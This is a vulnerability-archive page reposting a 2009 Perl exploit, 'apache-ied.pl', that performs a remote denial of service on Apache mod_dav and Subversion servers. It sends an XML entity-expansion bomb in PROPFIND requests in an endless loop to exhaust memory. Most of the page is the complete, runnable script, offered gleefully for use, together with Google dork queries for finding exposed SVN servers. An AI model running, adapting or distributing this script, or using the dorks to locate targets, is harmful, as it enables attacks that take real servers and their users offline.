Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21926
HistoryJun 02, 2009 - 12:00 a.m.

The father of all bombs - another webdav fiasco

2009-06-0200:00:00
vulners.com
35

Apache mod_dav / svn Remote Denial of Service Exploit

Google Dorks:
inurl:svn inurl:trunk
"powered by subversion version"

Information on the bug (XML Bomb):
http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/

Enjoy!


###apache-ied.pl

Apache mod_dav / svn Remote Denial of Service Exploit

by kcope / June 2009

Will exhaust all system memory

Needs Authentication on normal DAV

This can be especially serious stuff when used against

svn (subversion) servers!! Svn might let the PROPFIND slip through

without authentication. bwhahaaha :o)

use at your own risk!

##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "usage: perl apache-ied.pl <remotehost> <webdav folder>
[username] [password]\n";
print "example: perl apache-ied.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];

$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => 80,
Proto => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";
}
print $sock "\r\n";
$x = <$sock>;

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
print;
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);
}

$a = "";
for ($i=1;$i<256;$i++) { # Here you can increase the XML bomb count
$k = $i-1;
$a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"b4bew1thb1gb00bs\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack…\n";

$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length:
".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => 80,
Proto => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}